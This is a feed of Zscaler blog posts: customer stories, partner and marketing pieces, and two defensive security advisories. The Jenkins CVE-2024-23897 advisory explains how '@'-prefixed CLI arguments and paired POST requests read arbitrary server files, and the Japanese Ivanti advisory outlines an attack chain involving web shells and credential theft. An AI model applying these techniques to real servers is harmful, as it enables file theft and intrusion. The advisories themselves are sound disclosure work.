Over the years, most of our growth has been fueled by M&As. We plan on leveraging Zscaler to integrate acquired companies and enable these new users to have access to business-critical applications in days rather than months.
Combating data loss and insider threats
We are also on a mission to curb data loss overall and to combat insider threats, whether due to negligence or malicious motives. These challenging tasks are made easier with the multi-pronged defense made possible by the zero trust architecture we have in place and continue to build on.
By ensuring least privilege access and preventing lateral movement, we are limiting potential damage from abuse of insider access. The Zscaler’s Zero Trust Exchange plays a critical role in keeping these threats at bay by minimizing the attack surface—users connect only to a single application, not to the network.
As we continue on our zero trust journey, enhancing data protection in this age of generative AI engines like ChatGPT is a top priority. Zscaler’s inline TLS/SSL traffic inspection will be essential for preventing the leakage of sensitive data by identifying and blocking attempted unauthorized uploads to AI tools and across all our cloud apps.
Gaining deeper visibility into user activity is another focus area. While most of our employees are trusted, honest professionals, mistakes happen. By implementing deception tools such as honeypots and lures, our security team will receive alerts to help them detect anomalous insider behavior faster. This significantly reduces dwell time for any potential incidents.
A partnership for the long haul
As CISO, my aim is to continue delivering seamless access and robust security for our global staff as we grow our business and expand our presence and offer new services. The flexible, scalable Zero Trust Exchange aligns with this goal. Our partnership with Zscaler has been integral to Cushman & Wakefield’s cloud-first journey. Together, we’ve shifted from legacy networks to a unified, user-centric security model that enables productivity and protection anywhere.
I am confident that our journey toward a more secure and efficient future will continue successfully with Zscaler as our trusted partner. The results we have achieved thus far speak for themselves.
To learn more, read the case study.
Thu, 15 2月 2024 08:37:55 -0800Erik Harthttps://www.zscaler.jp/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscalerHow Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less
https://www.zscaler.jp/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-more
How Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less
On any given day, our team of security professionals who comprise the OMES Oklahoma Cyber Command stay on top of up to 17 million potential threats ranging from phishing and credential compromise to ransomware and data breaches. Dedicated to securing the digital assets of the State of Oklahoma government, these members are also stewards of massive amounts of sensitive personal and healthcare data—from our more than 30,000 employees and the nearly 4 million state residents served by our more than 180 agencies.
Thanks to the Zscaler Zero Trust Exchange platform, we are successfully managing this high volume of threats and safeguarding the vital data we have been entrusted with. One of the Zscaler superpowers we have come to rely on is its integration capabilities. By working in sync with other components of our security stack, Zscaler has taken us to the next level of our security maturity and zero trust transformation.
Keep pace by unifying security
We know that the spiraling volume of threats will always be a challenge, especially now that cybercriminals are beginning to leverage AI for malicious purposes. When new security challenges emerge, we need to be able to respond at lightning speed.
Amid all the change and complexity in the security and technology landscape, I’m finding that the solution is to simplify and unify our security infrastructure. One of the ways we have done that is by taking full advantage of Zscaler’s powerful integration capabilities. When you work with a single unified platform, it almost forces efficiency, and it certainly aids in the ongoing battle most state governments face of having to do more with less.
Integrations provide a holistic view
One of the things that differentiates Zscaler from other solutions is its open application programming interface (API), which has made it easy to integrate with our existing security solutions. In our environment, we’ve found that Zscaler plays well with other core tools we rely on—namely CrowdStrike and Splunk—in how it shares threat intelligence data and coordinates protection and incident response. The ability to tie these security tools together increases telemetry and gives us the opportunity to stop lateral threats before they become bigger problems that could potentially affect our users and our citizens.
Zscaler-CrowdStrike integration curbs lateral threat movement
By sharing telemetry and threat intelligence data between the CrowdStrike platform and the Zscaler Zero Trust Exchange, access policies can automatically be adapted according to changing user context, device health, and newly detected threats, making investigation and response faster and more effective. For example, let’s say we know there’s an attack occurring—maybe the next SolarWinds or a user just installed a new, unauthorized app that has weakened the endpoint posture. With the Zscaler-CrowdStrike integration, CrowdStrike can detect the change and recalculate the Falcon Zero Trust Assessment (ZTA) score and share it with Zscaler. Based on the updated ZTA score, Zscaler policy control can automatically adapt to a stricter threshold to only allow access via a browser isolation session or even block the connection to protect against access to selected mission-critical applications. Furthermore, the sharing of telemetry and threat intelligence is key to expanded visibility of the threat landscape, from endpoint to applications. After all, it wouldn’t be efficient if one security system knows something is critically important and doesn’t share this with another security domain!
As an inline security cloud, Zscaler can intercept any unknown zero-day payloads before they reach an endpoint and share the telemetry with CrowdStrike. This helps us quickly assess the existence of any such zero-day payload in the entire endpoint environment and provides the basis for automated cross-platform response workflow. This helps stop threats from moving laterally into critical systems, such as a database server housing financial information.
Zscaler-Splunk integration provides a centralized view
The Zscaler-Splunk integration gives us extensive analytics for in-depth visibility into usage, access, and the overall environment. The analytics correlate data, helping us perform proactive threat hunting and investigations by enabling us to identify abnormal patterns. Zscaler’s data logs correspond to the same schema as Splunk, so it makes correlation searches easy.
Zscaler logs are sent via a secure HTTPS push and delivered to Splunk’s HTTP Event Collector reliably and securely. Once in Splunk, the logs are normalized, which allows correlation across all data sources, providing end-to-end visibility. Splunk’s robust analytics include risk-based alerting (RBA) and user and entity behavior analytics (UEBA).
The tight integration simplifies security operations by reducing the need for our team to constantly swivel from one security console to another to get the information they need. The Splunk analytics dashboard serves as the hub of this wheel of zero trust protection. It shows activity across the enterprise in real time, regardless of user location. As a result of the Zscaler-Splunk integration, our security operations team has experienced significant gains in speed and efficiency.
In the past, I would have needed three to five different solutions to accomplish what Zscaler and its integrations can do on their own. We would not be as far along our path to zero trust as we are now without a platform like the Zscaler Zero Trust Exchange to help us out. It has exponentially improved our cybersecurity, and I’m proud to be a part of the amazing things that my team does every day to protect our employees and our citizens.
Read the case study to learn more about the State of Oklahoma’s Zscaler Zero Trust Exchange deployment.
Thu, 08 2月 2024 16:11:39 -0800Michael Tolandhttps://www.zscaler.jp/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-moreNow and Next: How Zscaler is Transforming to Fuel Channel Success
https://www.zscaler.jp/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-success
Looking back at 2023, it was impossible to escape the constant buzz surrounding cybersecurity incidents in the market. But amid the chaos, one thing became clear: the cybersecurity market was booming and the role of leaders and partners in ensuring customer safety was crucial. The same still rings true in 2024. As the cyber security market continues to evolve, Zscaler is proud to be at the forefront of innovation, and now, we’ve put the programs in place to allow our partners thrive in this digital era alongside us. Both for what’s now… and what’s next.
As we step into the second half of Zscaler’s fiscal year, we’re proud to showcase to partners the army of new opportunities we’ve designed to grow their business, maximize earnings, and elevate their skills. This includes a revamped incentive structure and new selling motions that empower partners with more collaborative selling opportunities throughout the sales cycle to deliver the greatest customer experience in their journey to digital transformation.
We have transformed our partnering foundation to provide comprehensive support throughout the customer lifecycle.
You’ve probably heard me say it before, zero trust is a team sport. In the 1H half of the year, we took on both an internal and external transformation to ensure that we have purposeful alignment, process, and engagement with our partners throughout the customer lifecycle. This means, from the earliest stages of our world-class sales process to the final delivery, our partners are integrated every step of the way, embedding their services and support to help our customers transition from legacy appliances to a true zero trust model.
We’re leading the charge with the market-leading platform, and now the most lucrative incentive framework, in the market today.
With the most comprehensive platform in the market today, Zscaler leads the charge. And now, we have introduced the most lucrative incentive framework to match. Over the past six months, my team and I hit the road to listen to our partners and understand what they truly desire in a partnership. One thing stood out loud and clear: they want to work with vendors who offer the most comprehensive security platform and drive profitability. That's why we have enhanced our incentives framework and channel-led selling motion, offering larger payouts, increased discount advantages, and performance bonuses. We want our partners to earn more and thrive in the cloud security market, establishing themselves as trusted advisors. As the digital landscape continues to evolve, Zscaler remains dedicated to supporting partners in driving customer success and achieving mutual growth.
We’re empowering our partners to thrive in the cloud security market and establish themselves as trusted advisors.
We know that for Zscaler and our partners alike, our number one commitment is driving customer success in the ever-evolving digital era. That’s why Zscaler not only continues to innovate its cloud security offerings to address emerging threats and challenges, but in the first half of our year, we simplified our certifications to help our partners become experts and build practices around zero trust. We also launched targeted enablement around Zscaler-powered customer outcomes to help our partners lead the way as trusted advisors to our customers.
But our journey is far from over. As we enter the second half of our fiscal year, we have more exciting announcements lined up to fuel partner success. We will introduce new offerings and specializations to help partners seamlessly integrate Zscaler into their practices. We will optimize our collaborative partnering approach and launch industry-leading tools to make Zscaler the easiest to do business with in the industry. We’ll also continue to be in the field with you each and every day, to make sure our valued partners have the support to deliver transformational outcomes to our customers.
We have achieved a lot in the first half of the year with your feedback and support throughout this transformative journey. We are fully dedicated to supporting our partners in reaching their maximum potential with Zscaler, both with what’s now and what’s next. Together, we are changing the channel and revolutionizing the cybersecurity market.
Thu, 08 2月 2024 05:00:02 -0800Karl Soderlundhttps://www.zscaler.jp/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-successJenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE
https://www.zscaler.jp/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce
Introduction
Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE).
This vulnerability, identified as CVE-2024-23897, poses a high risk and affects Jenkins integrated command line interfaces (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE.
In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in:
RCE through the exploitation of resource root URLs
RCE by manipulating a "Remember me" cookie
RCE through stored cross-site scripting (XSS) attacks via build logs
RCE by bypassing CSRF protection
Decryption of stored secrets in Jenkins
Deletion of any item within Jenkins
The downloading of Java heap dumps
Affected Versions
The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2.
Technical Details
The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller during the processing of CLI commands. Originally intended to enhance usability, a specific feature within args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user.
Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions, allowing any Jenkins user to access and read the entire content of arbitrary files on the Jenkins server when these options are enabled.
Figure 1. Jenkins configuration options
The figure below is an example taking the first rows of the C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) file using the CLI help command.
Figure 2. A demonstration text file created on the Jenkins server
There are two ways to invoke this vulnerability:
Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on Jenkins CLI to read a file.
Figure 3. Running the help command with Jenkins CLI tool to read the file content on Jenkins
The figure below shows the file content being read from the Jenkins server.
Figure 4: File content read from the Jenkins server
Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by utilizing the UUID from the session header.
Figure 5. Attack workflow demonstrating malicious HTTP request
Recommendations
To mitigate this vulnerability, upgrade to at least Jenkins versions 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability.
Those unable to immediately update to Jenkins 2.442 and LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation.
For instructions, see the documentation for this workaround.
Zscaler Coverage
The Zscaler ThreatLabZ team has deployed protection.
Zscaler Advanced Threat Protection:
APP.EXPLOIT.CVE-2024-23897
References
CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
Jenkins Security Advisory 2024-01-24
CVE-2024-23897.py
poc.py - binganao/CVE-2024-23897 · GitHub
RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm
Tue, 06 2月 2024 15:44:05 -0800Avinash Kumarhttps://www.zscaler.jp/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rceIoT/OT Predictions for 2024
https://www.zscaler.jp/blogs/product-insights/iot-ot-predictions-2024
How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year! By my calculation that works out to more than 25 devices for every human on the planet!
In this blog, we’ll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let’s jump in.
IoT/OT devices will see a higher degree of proliferation than ever before
Losing count of how many devices you have isn’t just a nuisance in the workplace; it’s a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices—not to mention keeping them secure—is only going to grow harder with the proliferation of sensors, monitors, point-of-sale, and myriad other devices that are feeding our hunger for data. Fortunately we’ve been working on that.
Edge AI will make these devices smarter, faster
No predictions blog post for 2024 would be complete without mention of the topic on everyone’s lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT is inevitable. It will only improve as time passes, increasing the number of autonomous decisions being made without oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk, if mishandled.
5G and other WAN connectivity will evolve to meet the needs of IoT/OT
It seems we’ve been hearing about 5G forever, but it’s now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring a local network infrastructure. And it’s not alone—newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we’re able to deploy sensors and other kinds of IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology.
Digital twins will still serve as proving grounds
The accelerated growth in the number of sensors continues to cultivate the use of digital twins; virtual representations of the world around them that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems.
Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and businesses more efficient and profitable. At the same time, it’s vital to ensure security is consideration number one when it comes to planning their deployment, especially when it comes to devices that talk to the internet.
This brings us to the flip side of these predictions: the challenges they pose.
Data privacy
The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses.
Ransomware on the (continued) rise
As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits.
The firmware problem
Remember earlier when I asked you if you knew how many devices you have deployed? Here’s another one for you. Of those devices, how many of them have their firmware up to date? Do you even know what firmware they’re running to be able to establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability. A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal.
The ongoing risks presented by legacy security
As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door for lateral movement across networks and geographical boundaries, allowing bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger.
All of these challenges and more point to only one conclusion: Organizations must adopt a zero trust security architecture in order to protect the IoT and OT devices they will inevitably deploy this year.
Conclusion
On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit positively we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust.
If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search ‘start here’ to find the next session to sign-up for.
Tue, 06 2月 2024 01:00:02 -0800Simon Tompsonhttps://www.zscaler.jp/blogs/product-insights/iot-ot-predictions-2024Why Firewalls and VPNs Give You a False Sense of Security
https://www.zscaler.jp/blogs/product-insights/why-firewalls-and-vpns-give-you-false-sense-security
Firewalls and VPNs were once hailed as the ultimate solutions for robust enterprise security, but in today’s evolving threat landscape, organizations face a growing number of breaches and vulnerabilities that are outpacing these solutions. Today, the world we work in looks very different from the on-premises era as industries transform how and where work gets done. Firewalls and VPNs are crumbling pillars of a bygone era. They provide a false sense of security because they come with significant weaknesses that put companies at risk—weaknesses that are only realized when embracing digital transformation.
Innovation in generative AI, automation, and IoT/OT technologies across industries is set to continue breaking barriers in 2024. This innovation also opens the door for attackers to automate phishing campaigns, craft evasive malware, reduce the development time of threats using AI, and even sell Ransomware-as-a-Service (RaaS).
With the growing severity and number of breaches, there’s a heightened concern that VPN vulnerabilities will leave the door open for attackers. According to a Cybersecurity Insider survey, nearly 50% of organizations experienced VPN-related attacks from July 2022 to July 2023, and 90% of organizations are concerned about attackers exploiting third-party vendors to gain backdoor access into their networks through VPNs.
It’s becoming clear that even the largest organizations with advanced firewalls still fall victim to breaches. Curious to know some of the reasons that firewalls and VPNs are letting organizations down? Read more below.
A thinner sheet of protection across a larger attack surface
VPNs and firewalls extend the network, increasing the attack surface with public IP addresses as they connect more users, devices, locations, and clouds. Users can now work from anywhere with an internet connection, further extending the network. The proliferation of IoT devices has also increased the number of Wi-Fi access points across this extended network, including that seemingly harmless Wi-Fi connected espresso machine needed for a post-lunch boost, creating new attack vectors to exploit.
Perimeter-based architecture means more work for IT teams
More doesn’t mean better when it comes to firewalls and VPNs. Expanding a perimeter-based security architecture rooted in firewalls and VPNs means more deployments, more overhead costs, more time wasted for IT teams - but less security and less peace of mind.
Pain also comes in the form of degraded user experience and satisfaction with VPN technology for the entire organization due to backhauling traffic (72% of organizations are slightly to extremely dissatisfied with their VPN experience).
Other challenges like the cost and complexity of patch management, security updates, software upgrades, and constantly refreshing aging equipment as an organization grows are enough to exhaust even the largest and most efficient IT teams. The bigger the network, the more operational complexity and time required.
VPNs and firewalls can’t effectively guard against today’s threat landscape
VPNs and firewalls deployed to protect and defend network access behave a lot like a security guard who sits at the front of a store in order to stop theft.
Security Guards
Firewalls and VPNs
Stationed at the front door of a valuable store - tasked with identifying and stopping attacks. Can’t monitor all entrances at the same time.
Deployed at key access points to an organization’s network. Can’t stop all the threats across every access point.
Once an attacker gets in, they get access to the entire store.
Permit lateral threat movement by placing users and entities onto the network.
1:few threat detection can’t scale unless you hire a lot of security guards to monitor all entrances.
Can’t inspect encrypted traffic and enforce real-time security policies at scale.
Can be slow, tired, expensive to hire, late for their shift and present a number of other issues that allow threats to go undetected and unanswered.
Suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more.
Much like a lone security guard, VPNs and firewalls can help mitigate some risk, but they can’t keep up with the scale and complexity of the cybercrime of today. Your network is extending exponentially as you digitally transform your organization. With constant attacks on the horizon and a thinner cover of protection, how many million security guards can you hire?
The Zero Trust Exchange delivers on the promise of security
Unlike network-centric technologies like VPNs - zero trust architecture minimizes your attack surface and connects users to the apps they need directly—without putting anyone or anything on the network as a whole.
Zscaler delivers zero trust with its cloud native platform: the Zscaler Zero Trust Exchange. The Zero Trust Exchange starts with the premise that no user, workload, or device is inherently trusted. The platform brokers a secure connection between a user, workload, or device and an application—over any network, from anywhere by looking at identity, app policies, and risk.
As threats grow more dangerous, we can’t rely on a single security guard to keep everybody out anymore. VPNs and firewalls were designed to make organizations feel secure, but with all the evolving threats of today highlighting the cracks in these technologies, IT and security teams are left with a false sense of security.
Truly secure digital transformation can only be delivered by implementing a zero trust architecture. The Zscaler Zero Trust Exchange is the comprehensive cloud platform designed to keep your users, workloads, IoT/OT, and B2B traffic safe in an environment where VPNs and firewalls can’t.
If you’d like to learn more, join our webinar that serves as an introduction to zero trust and provides entry-level information about the topic.
Or, if you’d like to go a level deeper, consider registering for one of our interactive whiteboard workshops for free
Mon, 05 2月 2024 14:26:59 -0800Sid Bhatiahttps://www.zscaler.jp/blogs/product-insights/why-firewalls-and-vpns-give-you-false-sense-securityThreatLabzのセキュリティ アドバイザリー:深刻なリスクをもたらすIvanti製VPNの新たなゼロデイ脆弱性
https://www.zscaler.jp/blogs/security-research/threatlabz-coverage-advisory-ivanti-s-vpn-vulnerabilities-exploited-hackers
はじめに
IT管理とセキュリティの企業であるIvantiは、2023年12月以降、中国政府の支援を受けたハッカーによって悪用された、同社のVPN製品の複数のゼロデイ脆弱性について公開しました。最初に公開されたのは、リモートの攻撃者に認証バイパスとリモート コマンド インジェクションを許可する2つのCVE (CVE-2023-46805およびCVE-2024-21887)です。Ivantiはパッチをリリースしたものの、権限昇格やサーバー側のリクエスト フォージェリーを許可する2つの新たな脆弱性(CVE-2024-21888およびCVE-2024-21893)を悪用する攻撃が確認されています。
米国サイバーセキュリティ インフラストラクチャー セキュリティ庁(CISA)は、2024年1月22日午後11時59分(米国東部標準時)までに最初の2つの脆弱性に対する軽減処置を実施するよう求める、アドバイザリーと緊急指令(ED-24-01)を公表しました。2つの脆弱性が新たに確認され、パッチが提供されていない状況を受けて、CISAは緊急指令の補足指示を発行し、連邦政府機関に対し、遅くとも2024年2月2日午後11時59分(米国東部標準時)までにIvanti Connect Secure (ICS)およびIvanti Policy Secure (IPS)ソリューションのすべてのインスタンスをネットワークから切り離すよう指示しました。
推奨される対応
CVE-2023-46805およびCVE-2024-21887への対応
パッチを適用する:Ivantiは最初の2つの脆弱性に対するパッチをリリースしています。このパッチを速やかに適用し、システムを保護する必要があります。
パッチの適用前に工場出荷時の設定にリセットする:Ivantiは、パッチを適用する前にアプライアンスを工場出荷時の状態にリセットすることを推奨しています。これは、潜在的な脅威アクターが環境内で永続性を維持できないようにするためです。
CVE-2024-21888およびCVE-2024-21893への対応
CISAからの補足指示(ED-24-01): CISAは連邦政府機関に対し、Ivanti Connect Secure (ICS)およびIvanti Policy Secure (IPS)ソリューションのすべてのインスタンスをネットワークから切り離すよう指示しています。これは連邦政府機関だけに限定されるものではなく、CISAはすべてのIvantiユーザーに対しても同様の措置を講じるよう要請しています。
パッチが利用可能になったら、推奨される対応に従ってパッチを適用します。
確認されたすべての問題への対応
影響を受けた可能性のあるすべてのシステムを企業のリソースから優先的にセグメント化し、攻撃の影響範囲を制限します。
影響を受けたIvanti製品に接続されたデバイス、またはIvanti製品から接続されたデバイスに対して、継続的に脅威ハンティング活動を実施します。
アイデンティティー管理サービスと認証異常を監視します。
最近作成または更新された特権アカウントをアクティブに監査します。
接続または公開されているシステムやアプリケーションの証明書、鍵、パスワードをすべて変更します。
属性
UTA0178は中国政府が支援し、スパイ活動を目的とするハッカー グループで、ICS VPNの脆弱性の悪用に関与したと考えられています。このグループはMISTCLOAK、BLUEHAZE、DARKDEWなどのマルウェア ファミリーを使用して、フィリピンに集中的に攻撃を仕掛けた可能性があります。
仕組み
攻撃者はICS VPNアプライアンスにアクセスするために、CVE-2023-46805 (認証のバイパスが可能となる脆弱性、CVSSスコア8.2)およびCVE-2024-21887 (複数のWebコンポーネントに見られるコマンド インジェクションの脆弱性、CVSSスコア9.1)の2つの脆弱性を悪用しています。初期の活動は2023年12月3日の時点ですでに発生していたことが確認されています。攻撃のほとんどは、Living Off The Land (環境寄生型)の手法によるものでしたが、他のツールが使われていたことも明らかになりました。
攻撃に使われたツールは次のとおりです。
PySoxyトンネラーとBusyBox (悪用後のアクティビティーを有効化)
ZIPLINE Passive Backdoor
THINSPOOL Dropper
LIGHTWIRE
WIREFIRE、BUSHWALK、CHAINLINEなどのWebシェル
WARPWIRE
攻撃チェーン
図1:攻撃チェーン
攻撃の詳細
最初の悪用:攻撃者は、脆弱なデバイスと悪用できそうな自動化について大規模なスキャンを実行しました。
永続化:悪用が成功すると、攻撃者は標的のデバイスにさまざまな種類のWebシェルを展開し、そして最初の足場を確立した後、構成データを盗み、既存のファイルを変更し、リモート ファイルをダウンロードし、デバイスからリバース トンネルを実行しました。さらには、構成ファイルをバックドア化し、追加のツールを展開しました。
偵察:攻撃者はプロキシ接続を通じて内部システムやアプリケーションの偵察を行いました。
認証情報の窃取:攻撃者は、ユーザーが使用するログイン ページにWARPWIREと呼ばれるJavaScriptベースの独自のマルウェアを挿入し、平文の資格情報を取得して持ち出しました。
ラテラル ムーブメント:攻撃者は、窃取した認証情報を使用して水平に移動し、RDP、SMB、SSH経由で内部システムに接続しました。
証拠の消去:攻撃者はログを消去し、ペイロードを展開した後にシステムをクリーンな状態に戻すことも確認されています。
回避(パッチと検出)::検出を回避する手段として、攻撃者は完全性チェック ツール(ICT)を変更し、システム上の変更や追加にフラグが立てられないよう無効化する場合もあります。攻撃者が使用したZIPLINEツールは、ICTツールが使用するexclusion_listに自身を追加することで、ICT検出を回避するように設定されていました。さらに、攻撃が公表されると、攻撃者は検出を回避するためにツールを変更することですぐに適応しました。その結果、初期攻撃の新たな亜種が最近の攻撃で確認されています。
Zscalerのソリューション
Zscalerのクラウドネイティブなゼロトラスト ネットワーク アクセス(ZTNA)により、すべてのユーザーはどこからでもプライベート アプリに迅速かつ安全にアクセスできるようになります。また、リモート アクセスのIPアドレスをインターネットに公開することなく、内側から外側へのセキュアな接続を確保することで、攻撃対象領域と脅威のラテラル ムーブメントのリスクを軽減します。拠点やリモート ユーザーに対しても、一貫したセキュリティ ポリシーを簡単に導入、施行できます。
Zscaler Private Access™ (ZPA)はあらゆる場所でプライベート アプリへのアクセスを保護し、AIを活用したユーザーとアプリ間のセグメンテーションでユーザーをネットワークではなくアプリに接続させます。そして、インサイドアウト接続でラテラル ムーブメントを防止します。
アプリケーション保護、デセプション、データ保護の機能を統合した、プライベート アプリ向けの包括的なサイバー脅威対策とデータ保護を展開します。
図2:サイバー脅威のリスクを高めるVPNの脆弱性とゼロトラスト アーキテクチャーでこれらのリスクから保護するZPA
ゼロトラストは、ファイアウォールやVPN上に構築されたアーキテクチャーとは根本的に異なり、クラウドやエッジからSecurity as a Serviceを配信するため、複雑なアプライアンス スタック(ハードウェアと仮想どちらも)にトラフィックをバックホールする必要がありません。任意のユーザーを任意のアプリケーションに直接接続する1対1のセキュアなAny-to-Any接続を提供します。ネットワーク全体にエンティティーを接続させることはなく、最小特権アクセスの原則に従います。セキュリティと接続をネットワークから切り離すことで、境界ベースのアプローチに伴う前述の課題を解消できるのがゼロトラストなのです。ゼロトラスト アーキテクチャーを採用すべき理由には、次の4つが挙げられます。
攻撃対象領域の最小化:ファイアウォール、VPN、公開IPアドレスを排除するほか、インバウンド接続を許可せず、アプリをゼロトラスト クラウドの背後に隠します。
不正侵入の阻止:クラウドならではの機能を活用して、暗号化されたトラフィックを含むすべてのトラフィックを大規模に検査し、リアルタイムでポリシーを施行して脅威を阻止します。
脅威のラテラル ムーブメントの防止:ネットワーク全体へのアクセスを拡張するのではなく、エンティティーを個々のITリソースに接続させます。
情報漏洩の阻止:漏洩する可能性のあるすべてのパス(暗号化されたトラフィックを含む)全体にポリシーを施行し、転送中データ、保存データ、使用中のデータを保護します。
さらに、ゼロトラスト アーキテクチャーはユーザー エクスペリエンスの改善、運用の複雑さの軽減、コストの削減などのメリットを実現し、ファイアウォールやVPN、境界ベースのアーキテクチャーが抱える多くの問題を解消します。
Zscaler ThreatLabzは、この種の攻撃から組織を保護するために次の機能を実装することを推奨しています。
Zscaler Private Accessを使用してラテラル ムーブメントを制限し、従業員やサードパーティーの請負業者に対して最小特権アクセスの原則を適用し、ユーザーとアプリ間のセグメンテーション ポリシーを確立することで、組織の重要なアプリケーションを保護する。
アイデンティティーベースのマイクロセグメンテーションでラテラル ムーブメントを制限し、潜在的な不正侵入による影響を抑制する。
Zscaler Private Accessでプライベート アプリケーションのトラフィックをインラインで完全に検査し、侵害されたユーザーによるプライベート アプリケーションの悪用を防止する。
高度なクラウド サンドボックスで、第2段階のペイロードで配信される未知のマルウェアを防止する。
Zscaler Deceptionでデコイ(おとり)のサーバー、アプリケーション、ディレクトリー、ユーザー アカウントで攻撃者をおびき寄せ、ラテラル ムーブメントや権限昇格を試みる攻撃者を検知して封じ込める。
Zscaler Internet Access経由ですべてのサーバー トラフィックをルーティングすることで、侵害されたサーバーからの悪意のあるアクティビティーを特定して阻止する。
重要インフラからのトラフィックを許可リストの宛先のみに制限する。
信頼できる送信元からのトラフィックも含め、すべてのSSL/TLSトラフィックを検査する。
高度な脅威対策を有効にして既知のコマンド&コントロール ドメインをすべてブロックする。
高度なクラウド ファイアウォールで、新たなC&Cの宛先を含むすべてのポートとプロトコルにコマンド&コントロールの保護を拡張する。
ベスト プラクティス
CISAの指示に従う
これらの脆弱性の影響を最小限に抑えるには、Ivanti脆弱性に関するCISAの緊急指令をタイムリーに遵守することが重要です。
ゼロトラスト アーキテクチャーを実装する
セキュリティに対する従来のアプローチを見直し、VPNやファイアウォールなどの脆弱なアプライアンスから脱却する必要があります。AI/MLモデルによって強化された真のゼロトラスト アーキテクチャーを実装し、悪意のあるトラフィックや脅威をブロックして隔離することが、重要な第一歩です。ユーザーをアプリケーションと同じネットワークに接続するのではなく、ユーザーとアプリケーション間のセグメンテーションを優先することで、ラテラル ムーブメントが抑制され、攻撃者が重要なアプリケーションに到達できないようにします。
環境を保護するための事前予防的な対策を講じる
Ivantiに影響を与えた最近の脆弱性を考慮すると、潜在的な悪用のリスクから組織を守るには、次のようなベスト プラクティスを採用する必要があります。
